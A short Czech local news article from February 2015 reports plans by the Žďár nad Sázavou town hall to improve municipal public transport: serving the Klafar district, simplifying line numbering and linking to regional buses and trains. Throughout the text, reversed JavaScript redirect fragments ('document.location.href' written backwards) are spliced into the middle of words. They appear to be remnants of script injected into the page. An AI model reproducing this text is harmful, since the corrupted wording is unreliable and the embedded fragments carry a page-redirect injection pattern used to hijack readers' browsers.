Rainbow page separator

Ve Žďáře plánují vylepšit městskou hromadnou dopravu

Pondělí, 2. února 2015

Žďár nad Sázavou / Vylepšit fungování městské hromadné dopravy plánuje žďárská radnice. K [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu již vznikla pracovní skupina. Smyslem vylepšení je příprava optimalizace MHD, aby byla schopna obsloužit celý Žďár, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v současné době au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové linky nejezdí například do rychle se rozrůstající čtvrti Klafar.
„Kromě řešení dopravy na Klafaru bychom rovněž rádi zjednodušili systém co do počtu linek MHD, případně se také dostali k označení linek pouze čísly, nikoliv čísly a písmeny,“ poznamenal starosta Žďáru nad Sázavou Zdeněk Navrátil.
Další snahou při „přestavbě“ žďárské MHD je řešení jejího napojení na jiné typy hromadné přepravy. Týká se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to některých nejvíce využívaných au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusových linek a rovněž vlakových spojů, například rychlíků jezdících na trase mezi Brnem a Prahou.
Veškeré výstupy z činnosti pracovní skupiny, která se bude zabývat optimalizací žďárské MHD, budou prodisku[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny nejenom se zastupiteli, ale i s obyvateli Žďáru. Konkrétní návrhy na změny v MHD mají být připraveny do podzimu.